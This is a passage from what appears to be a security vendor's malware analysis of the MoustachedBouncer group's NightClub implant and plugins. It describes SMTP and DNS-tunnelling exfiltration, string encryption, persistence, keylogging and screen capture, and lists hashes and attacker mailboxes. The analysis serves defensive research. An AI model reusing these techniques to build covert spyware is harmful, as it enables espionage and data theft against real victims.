toolsets.<\/p>\n<h4>Recent-files stealer (SHA-1: 0DAEA89F91A55F46D33C294CFE84EF06CE22E393)<\/h4>\n<p>This plugin is a Windows executable named <span>It11.exe<\/span>. We believe it was executed via the reverse shell mentioned above. There is no persistence mechanism implemented in the plugin.<\/p>\n<p>It gets the files recently opened on the machine by reading the content of the folder <span>%USERPROFILE%Recent<\/span> (on Windows XP) or of <span>%APPDATA%MicrosoftWindowsRecent<\/span> (in newer Windows versions). Those folders contain LNK files, each pointing to a recently opened file.<\/p>\n<p>The plugin embeds its own LNK format parser in order to extract the path to the original file.<\/p>\n<p>We were unable to make this plugin work, but static analysis shows that the files are exfiltrated to the SMB share <span>\\24.9.51[.]94EDGEUPDATEupdate<\/span>. The plugin maintains a list of already exfiltrated files, and their CRC-32 checksum, in <span>%TEMP%index.dat<\/span>. This likely avoids retransmitting the same file more than once.<\/p>\n<h4>External drive monitor (SHA-1: 11CF38D971534D9B619581CEDC19319962F3B996)<\/h4>\n<p>This plugin is a Windows executable named <span>It3.exe<\/span>. As with the recent-files stealer, it doesn\u2019t implement any persistence mechanism.<\/p>\n<p>The plugin calls <span>GetLogicalDrives<\/span> in a loop to get a list of all connected drives, including removable ones such as USB keys. Then, it does a raw copy of the NTFS volume of each removable drive and writes it in the current working directory, <span>C:UsersPublic<\/span> in our example. The filename is a randomly generated string of six to eight alphanumeric characters, for example <span>heNNYwmY<\/span>.<\/p>\n<p>It maintains a log file in <span>&lt;working directory&gt;index.dat<\/span> with the CRC-32 checksums of the copied disks.<\/p>\n<p>The plugin doesn\u2019t appear to have any exfiltration capabilities. It is likely that the staged drive dumps are later retrieved using the reverse shell.<\/p>\n<h3>NightClub<\/h3>\n<p>Since 2014, MoustachedBouncer has been using a malware framework we named NightClub because it contains a C++ class named <span>nightclub<\/span>. We found samples from 2014, 2017, 2020, and 2022. This section describes the evolution of NightClub from a simple backdoor to a fully modular C++ implant.<\/p>\n<p>In summary, NightClub is an implant family using emails for its C&amp;C communications. Since 2016, additional modules could be delivered by email to extend its spying capabilities.<\/p>\n<h4>NightClub \u2013 2014<\/h4>\n<p>This is the oldest known version of NightClub. We found a dropper and an orchestrator.<\/p>\n<p>The dropper (SHA-1: <span>0401EE7F3BC384734BF7E352C4C4BC372840C30D<\/span>) is an executable named <span>EsetUpdate-0117583943.exe<\/span>, and it was uploaded to VirusTotal from Ukraine on 2014-11-19. We don\u2019t know how it was distributed at that time.<\/p>\n<p>The main function, illustrated in Figure 9, loads the resource <span>MEMORY<\/span> and writes its content in <span>%SystemRoot%System32creh.dll<\/span>. It is stored in cleartext in the PE resource.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 9. Main function of the dropper\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-main-dropper.png\" title=\"Figure 9. Main function of the dropper\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">9<\/span><\/em><span lang=\"EN-US\"><em>. Main function of the dropper<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Then, the dropper modifies the Creation, Access, and Write timestamps of <span>creh.dll<\/span> to those of the genuine Windows DLL <span>user32.dll.<\/span><\/p>\n<p>Finally, it creates a Windows service named <span>WmdmPmSp<\/span> and sets, in the registry, its <span>ServiceDll<\/span> to <span>%SystemRoot%System32creh.dll \u2013<\/span> see Figure 10.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 10. Modification of the value ServiceDll\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-servicedll.png\" title=\"Figure 10. Modification of the value ServiceDll\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">10<\/span><span lang=\"EN-US\">. Modification of the value <\/span><span><span lang=\"EN-US\">ServiceDll<\/span><\/span><\/em><\/p>\n<\/figcaption><\/figure>\n<p>The previously dropped DLL, <span>creh.dll<\/span> (SHA-1: <span>5B55250CC0DA407201B5F042322CFDBF56041632<\/span>) is the NightClub orchestrator. It has a single export named <span>ServiceMain<\/span> and its PDB path is <span>D:ProgrammingProjectsWorkSwampThingReleaseWin32WorkingDll.pdb.<\/span><\/p>\n<p>It is written in C++ and the names of some methods and classes are present in the RTTI data \u2013 see Figure 11.<\/p>\n<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 11. Method and class names from the RTTI data\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-11.png\" title=\"Figure 11. Method and class names from the RTTI data\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">11<\/span><\/em><span lang=\"EN-US\"><em>. Method and class names from the RTTI data<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>Some of the strings are encrypted using the following linear congruential generator (LCG): <span>staten+1 = (690069 \u00d7 staten + 1) mod 232<\/span>. For each encrypted string, a seed (state0) between 0 and 255 is provided. To decrypt a string, the <span>staten<\/span> is subtracted from each encrypted <span>byten<\/span>. An example of an encrypted string structure is shown in Figure 12.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 12. Encrypted string format\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-encrypted-string.png\" title=\"Figure 12. Encrypted string format\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">12<\/span><\/em><span lang=\"EN-US\"><em>. Encrypted string format<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>A non-encrypted log file is present in <span>C:WindowsSystem32servdll.log<\/span>. It contains very basic information about the initialization of the orchestrator \u2013 see Figure 13.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 13. Log file\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-log-file.png\" title=\"Figure 13. Log file\" width=\"\"><figcaption>\n<p><a><\/a><em><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">13<\/span><span lang=\"EN-US\">. Log file<\/span><\/em><\/p>\n<\/figcaption><\/figure>\n<p>NightClub has two main capabilities:<\/p>\n<p>\u2022<span><br \/>\n<\/span>Monitoring files<\/p>\n<p>\u2022<span><br \/>\n<\/span>Exfiltrating data via SMTP (email)<\/p>\n<h5>File monitor<\/h5>\n<p>Functionality implemented here is very close to that of the recent file monitor plugin seen in 2020 and described above. It also browses the directories <span>%USERPROFILE%Recent<\/span> on Windows XP, and in newer Windows versions <span>%APPDATA%MicrosoftWindowsRecent<\/span>, and implements the same LNK parser \u2013 see Figure 14 and Figure 15.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 14. LNK parser (2014 sample \u2013 5B55250CC0DA407201B5F042322CFDBF56041632)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2014-lnk-parser.png\" title=\"Figure 14. LNK parser (2014 sample \u2013 5B55250CC0DA407201B5F042322CFDBF56041632)\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">14<\/span><span lang=\"EN-US\">. LNK parser (2014 sample \u2013 <\/span><span><span lang=\"EN-US\">5B55250CC0DA407201B5F042322CFDBF56041632<\/span><\/span><\/em><span lang=\"EN-US\"><em>)<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<figure><img decoding=\"async\" alt=\"Figure 15. LNK parser (2020 sample \u2013 0DAEA89F91A55F46D33C294CFE84EF06CE22E393)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2020-lnk-parser-1.png\" title=\"Figure 15. LNK parser (2020 sample \u2013 0DAEA89F91A55F46D33C294CFE84EF06CE22E393)\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"FR\">Figure <\/span><span lang=\"FR\">15<\/span><span lang=\"FR\">. LNK parser (2020 sample \u2013 <\/span><span><span lang=\"FR\">0DAEA89F91A55F46D33C294CFE84EF06CE22E393<\/span><\/span><\/em><span lang=\"FR\"><em>)<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<\/p>\n<p>The files retrieved from the LNK files are copied to <span>%TEMP%&lt;original filename&gt;.bin<\/span>. Note that unlike the 2020 variant, only files with extensions <span>.doc<\/span>, <span>.docx<\/span>, <span>.xls<\/span>, <span>.xslx<\/span>, or <span>.pdf<\/span> are copied.<\/p>\n<p>It also monitors removable drives in a loop, in order to steal files from them.<\/p>\n<h5>SMTP C&amp;C communications<\/h5>\n<p>NightClub uses the SMTP protocol to exfiltrate data. Even if C&amp;C communication by email is not unique to MoustachedBouncer and is also used by other adversaries such as Turla (see <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2019\/05\/ESET-LightNeuron.pdf\">LightNeuron<\/a> and the <a href=\"https:\/\/web-assets.esetstatic.com\/wls\/2018\/08\/Eset-Turla-Outlook-Backdoor.pdf\">Outlook<\/a> backdoor), it is quite rare. The code is based on the CSmtp project available on <a href=\"https:\/\/github.com\/korisk\/csmtp\/blob\/master\/CSmtp.cpp\">GitHub<\/a>. The email accounts\u2019 information is hardcoded, encrypted with the LCG algorithm. In the sample we analyzed, the mail configuration is:<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>SMTP server<\/strong>: <span>smtp.seznam.cz<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender address<\/strong>: <span>glen.morriss75@seznam[.]cz<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender password<\/strong>: &lt;redacted&gt;<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Recipient address<\/strong>: <span>SunyaF@seznam[.]cz<\/span><\/p>\n<p>seznam.cz is a Czech web portal offering a free webmail service. We believe the attackers created their own email accounts, instead of compromising legitimate ones.<\/p>\n<p>NightClub exfiltrates the files previously copied to <span>%TEMP%<\/span> by the file monitor functionality (<span>FileMonitor<\/span> in Figure 11). They\u2019re encoded in base64 and added as an attachment. The attachment name is the original filename with the .bin extension.<\/p>\n<p>Figure 16 shows the exfiltration of a file via SMTP. NightClub authenticates using the credentials for the <span>glen.morriss75@seznam[.]cz<\/span> account and sends an email to <span>SunyaF@seznam[.]cz<\/span> with the stolen file attached.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 16. TCP stream of the SMTP communication from our test machine\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure16.png\" title=\"Figure 16. TCP stream of the SMTP communication from our test machine\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">16<\/span><\/em><span lang=\"EN-US\"><em>. TCP stream of the SMTP communication from our test machine<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<\/p>\n<p>Note that some headers that might look suspicious at first sight are the defaults from the CSmtp project, so they are probably not distinctive. These include:<\/p>\n<p>\u2022<span><br \/>\n<\/span><span>X-Mailer: The Bat! (v3.02) Professional<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><span>Content-Type: multipart\/mixed; boundary=&#8221;__MESSAGE__ID__54yg6f6h6y456345&#8243;<\/span><\/p>\n<p>The Bat! is an email client widely used in Eastern Europe. As such, the <span>X-Mailer<\/span> header likely blends in with email traffic in Belarus.<\/p>\n<h4>NightClub \u2013 2017 (SHA-1: F92FE4DD679903F75ADE64DC8A20D46DFBD3B277)<\/h4>\n<p>In 2017, we found a more recent version of NightClub, which was compiled on 2017-06-05. On the victim\u2019s machine, it was located at <span>C:WindowsSystem32metamn.dll<\/span>. Its filename in the DLL export directory is <span>DownloaderService.dll<\/span>, and it has a single export named <span>ServiceMain<\/span>. It contains the PDB path <span>D:AbcdMainProjectRootsrcProjectsMainSInkReleasex64EtfFavoriteFinder.pdb. <\/span><\/p>\n<p>To persist, it creates a Windows service named <span>WmdmPmSp<\/span>, as in previous versions. Unfortunately, we have not been able to recover the dropper.<\/p>\n<p>This NightClub version also includes a few C++ class and method names, including <span>nightclub<\/span>, in the RTTI data \u2013 see Figure 17.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 17. Method and class names from the RTTI data of the 2017 NightClub version\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-17.png\" title=\"Figure 17. Method and class names from the RTTI data of the 2017 NightClub version\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">17<\/span><\/em><span lang=\"EN-US\"><em>. Method and class names from the RTTI data of the 2017 NightClub version<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>As in previous versions, C&amp;C communications use the SMTP protocol, via the CSmtp library, with hardcoded credentials. In the sample we analyzed, the mail configuration is:<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>SMTP server<\/strong>: <span>smtp.mail.ru<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender address<\/strong>: <span>fhtgbbwi@mail[.]ru<\/span><\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Sender password<\/strong>: [redacted]<\/p>\n<p>\u2022<span><br \/>\n<\/span><strong>Recipient address<\/strong>: <span>nvjfnvjfnjf@mail[.]ru<\/span><\/p>\n<p>The main difference is that they switched the free email provider from Seznam.cz to Mail.ru.<\/p>\n<p>This NightClub version uses external plugins stored in the folder <span>%APPDATA%NvmFilter<\/span>. They are DLLs named <span>&lt;random&gt;.cr <\/span>(e.g., <span>et2z7q0FREZ.cr<\/span>) with a single export named <span>Starts<\/span>. We have identified two plugins: a keylogger and a file monitor.<\/p>\n<h5>Keylogger (SHA-1: 6999730D0715606D14ACD19329AF0685B8AD0299)<\/h5>\n<p>This plugin was stored in <span>%APPDATA%NvmFilteret2z7q0FREZ.cr<\/span> and is a DLL with one export, <span>Starts<\/span>. It contains the PDB path <span>D:ProgrammingProjectsAutogenKhAutogenAlgReleasex64SearchIdxDll.pdb<\/span> and was developed in C++. RTTI data shows a few class names \u2013 see Figure 18.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 18. Method and class names from the RTTI data of the NightClub keylogger plugin\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-18.png\" title=\"Figure 18. Method and class names from the RTTI data of the NightClub keylogger plugin\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">18<\/span><\/em><span lang=\"EN-US\"><em>. Method and class names from the RTTI data of the NightClub keylogger plugin<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The keylogger implementation is rather traditional, using the Windows <span>GetKeyState<\/span> API function \u2013 see Figure 19.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 19. NightClub keylogger\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/keylogger.png\" title=\"Figure 19. NightClub keylogger\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">19<\/span><\/em><span lang=\"EN-US\"><em>. NightClub keylogger<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The keylogger maintains a cleartext log file in <span>%TEMP%uirtl.tmp<\/span>. It contains the date, the title of the application, and the logged keystrokes for this specific application. An example, which we generated, is provided in Figure 20.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 20. Example of the output of the keylogger (generated by us)\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-20.png\" title=\"Figure 20. Example of the output of the keylogger (generated by us)\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">20<\/span><\/em><span lang=\"EN-US\"><em>. Example of the output of the keylogger (generated by us)<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<h5>File monitor (SHA-1: 6E729E84C7672F048ED8AE847F20A0219E917FA)<\/h5>\n<p>This plugin was stored in <span>%APPDATA%NvmFiltersTUlsWa1.cr<\/span> and is a DLL with a single export named Starts. Its PDB path, <span>D:ProgrammingProjectsAutogenKhAutogenAlgReleasex64FileMonitoringModule.pdb<\/span>, has not been stripped, and it reuses code from the 2014 and 2020 file monitors, described above. It monitors drives and recent files, and copies files for exfiltration to <span>%TEMP%AcmSymrm<\/span>. Its log file is stored in <span>%TEMP%indexwti.sxd.<\/span><\/p>\n<h4>NightClub \u2013 2020\u20132022<\/h4>\n<p>In 2020-11, we observed a new version of NightClub deployed in Belarus, on the computers of the diplomatic staff of a European country. In 2022-07, MoustachedBouncer again compromised some of the same computers. The 2020 and 2022 versions of NightClub are almost identical, and the compromise vector remains unknown.<\/p>\n<p>Its architecture is slightly different from the previous versions, as the orchestrator also implements networking functions. The second component, which its developers call the module agent, is only responsible for loading the plugins. All samples were found in the folder <span>%APPDATA%microsoftdef<\/span> and are written in C++ with statically linked libraries such as CSmtp or cpprestsdk. As a result, the executables are quite large \u2013 around 5MB.<\/p>\n<h5>Orchestrator<\/h5>\n<p>On the victims\u2019 machines, both orchestrator variants (SHA-1: <span>92115E21E565440B1A26ECC20D2552A214155669<\/span> and <span>D14D9118335C9BF6633CB2A41023486DACBEB052<\/span>) were named <span>svhvost.exe<\/span>. We believe MoustachedBouncer tried to masquerade as the name of the legitimate executable <span>svchost.exe<\/span>. For persistence, it creates a service named <span>vAwast<\/span>.<\/p>\n<p>Contrary to previous versions, to encrypt the strings they simply add <span>0x01<\/span> to each byte. For example, the string <span>cmd.exe<\/span> would be encrypted as <span>dne\/fyf<\/span>. Another difference is that the configuration is stored in an external file, rather than hardcoded in the binary. It is stored in the hardcoded path <span>%APPDATA%MicrosoftdefGfr45.cfg<\/span> and the data is decrypted with a private 2048-bit RSA key (see Figure 21) using the function <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/bcrypt\/nf-bcrypt-bcryptimportkeypair\"><em>BCryptImportKeyPair<\/em><\/a> and <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/bcrypt\/nf-bcrypt-bcryptdecrypt\"><em>BCryptDecrypt<\/em><\/a>.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 21. Hardcoded private RSA key\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-21.png\" title=\"Figure 21. Hardcoded private RSA key\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">21<\/span><\/em><span lang=\"EN-US\"><em>. Hardcoded private RSA key<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The config is formatted in JSON, as shown in Figure 22. <\/p>\n<figure><img decoding=\"async\" alt=\"Figure 22. NightClub external configuration format\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/figure-22.png\" title=\"Figure 22. NightClub external configuration format\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">22<\/span><\/em><span lang=\"EN-US\"><em>. NightClub external configuration format<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The most important keys are <span>transport<\/span> and <span>modules<\/span>. The former contains information about the mailbox used for C&amp;C communications, as in the previous versions. The latter contains the list of modules.<\/p>\n<h5>Module agent<\/h5>\n<p>The two variants of the module agent (SHA-1: <span>DE0B38E12C0AF0FD63A67B03DD1F8C1BF7FA6128<\/span> and <span>E6DE72516C1D4338D7E45E028340B54DCDC7A8AC<\/span>) were named <span>schvost.exe<\/span>, which is another imitation of the <span>svchost.exe<\/span> filename.<\/p>\n<p>This component is responsible for starting the modules that are specified in the configuration. They are DLLs, each with an export named <span>Start <\/span>or <span><span>Starts<\/span><\/span>. They are stored on disk unencrypted with the <span>.ini<\/span> extension, but actually are DLLs<span>.<\/span><\/p>\n<h5>Modules<\/h5>\n<p>Over the course of our investigation, we found five different modules: an audio recorder, two almost identical screenshotters, a keylogger, and a DNS backdoor. For all of them: their configuration, which is formatted in JSON, is passed as an argument to the <span>Start <\/span>or<span><br \/>\n<span>Starts<\/span><\/span> function.<\/p>\n<p>By default, the output of the plugin is written in <span>%TEMP%tmp123.tmp<\/span>. This can be changed using the config field <span>file<\/span>. Table 3 shows the different plugins.<\/p>\n<p><em>Table 3. NightClub plugins<\/em><\/p>\n<p><em><\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"142\">\n<p><strong><span lang=\"EN-US\">DLL export name<\/span><\/strong><\/p>\n<\/td>\n<td width=\"273\">\n<p><strong><span lang=\"EN-US\">Configuration<\/span><\/strong><\/p>\n<\/td>\n<td width=\"205\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">NotifyLoggers.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;chk_t&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;r_d&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;f_hs&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;t_hs&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">An audio recorder that uses the <a href=\"https:\/\/en.wikipedia.org\/wiki\/LAME\"><em><span>Lame<\/span><\/em><\/a> library, and <\/span><span><span lang=\"EN-US\">mciSendStringW<\/span><\/span><span lang=\"EN-US\"> to control the audio device. The additional configuration fields are likely used to specify options for Lame.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">MicroServiceRun.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;<br \/><span><br \/>\n<\/span>&#8220;capture_on_key_press&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;period_in_sec&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;quality&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;app_keywords&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">A screenshotter that uses <\/span><span><span lang=\"EN-US\">CreateCompatibleDC<\/span><\/span><span lang=\"EN-US\"> and <\/span><span><span lang=\"EN-US\">GdipSaveImageToStream<\/span><\/span><span lang=\"EN-US\"> and writes captured images in <\/span><span><span lang=\"EN-US\">file<\/span><\/span><span lang=\"EN-US\"> to disk. If <\/span><span><span lang=\"EN-US\">app_keywords<\/span><\/span><span lang=\"EN-US\"> is not empty, it uses <\/span><span><span lang=\"EN-US\">GetForegroundWindow<\/span><\/span><span lang=\"EN-US\"> to check the name of the active Window and capture it only if it matches <\/span><span><span lang=\"EN-US\">app_keywords<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">JobTesterDll.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">A keylogger that uses the <\/span><span><span lang=\"EN-US\">GetKeyState<\/span><\/span><span lang=\"EN-US\"> API. It writes the log in <\/span><span><span lang=\"EN-US\">file<\/span><\/span><span lang=\"EN-US\"> to disk and the format is <\/span><span><span lang=\"EN-US\">&lt;Date&gt;&lt;Title bar&gt;&lt;content&gt;<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"142\">\n<p><span><span lang=\"EN-US\">ParametersParserer.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"273\">\n<p><span><span lang=\"EN-US\">{<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;name&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;enabled&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;max_size&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;file&#8221;:&#8221;&lt;value&gt;&#8221;,<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\"><span><br \/>\n<\/span>&#8220;cc_server_address&#8221;:&#8221;&lt;value&gt;&#8221;<\/span><\/span><\/p>\n<p><span><span lang=\"EN-US\">}<\/span><\/span><\/p>\n<\/td>\n<td width=\"205\">\n<p><span lang=\"EN-US\">A DNS-tunneling backdoor. <\/span><span><span lang=\"EN-US\">cc_server_address<\/span><\/span><span lang=\"EN-US\"> specifies the IP address of a DNS server to which requests are sent. More details follow.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><\/em><\/p>\n<p>The DNS-tunneling backdoor (<span>ParametersParserer.dll<\/span>) uses a custom protocol to send and receive data from a malicious DNS server (<span>cc_server_address<\/span>). Figure 23 shows that the DNS request is sent to the IP address provided in the configuration, using the <span>pExtra<\/span> parameter of <span>DnsQuery_A<\/span>.<\/p>\n<figure><img decoding=\"async\" alt=\"Figure 23. DNS request to the C&amp;C server\" height=\"\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2023\/2023-8\/2022-plugin-dns-request.png\" title=\"Figure 23. DNS request to the C&amp;C server\" width=\"\"><figcaption>\n<p><em><a><\/a><span lang=\"EN-US\">Figure <\/span><span lang=\"EN-US\">23<\/span><\/em><span lang=\"EN-US\"><em>. DNS request to the C&amp;C server<\/em><\/span><\/p>\n<\/figcaption><\/figure>\n<p>The plugin adds the data to exfiltrate as part of the subdomain name of the domain that is used in the DNS request (<span>pszName<\/span> above). The domain is always <span>11.1.1.cid<\/span> and the data is contained in the subdomain. It uses the following format, where <span>x<\/span> is the letter, not some variable:<\/p>\n<p><span>x + &lt;modified base64(buffer)&gt; + x.11.1.1.cid<\/span><\/p>\n<p>For example, the first DNS request the plugin sends is <span>xZW1wdHkx.11.1.1.cid<\/span>, where <span>ZW1wdHk<\/span> decodes to <span>empty<\/span>. <\/p>\n<p>Note that the base64 function is not standard. It removes the <span>=<\/span>, if any, from the result of the base64 encoding, and also replaces <span>\/ <\/span>characters with <span>-s<\/span> and <span>+<\/span> characters with <span>-p<\/span>. This is to create valid subdomains, because standard base64 encoding output can include <span>+<span>, \/<\/span><br \/>\n<\/span>and<span><br \/>\n<span>=<\/span><br \/>\n<\/span>characters, all of which are invalid in domain names and could be detected in network traffic.<\/p>\n<p>Then, the plugin reads the result that should be one or many TXT DNS records, since the flag <span>DNS_TYPE_TEXT<\/span> is passed to <span>DnsQuery_A<\/span>. 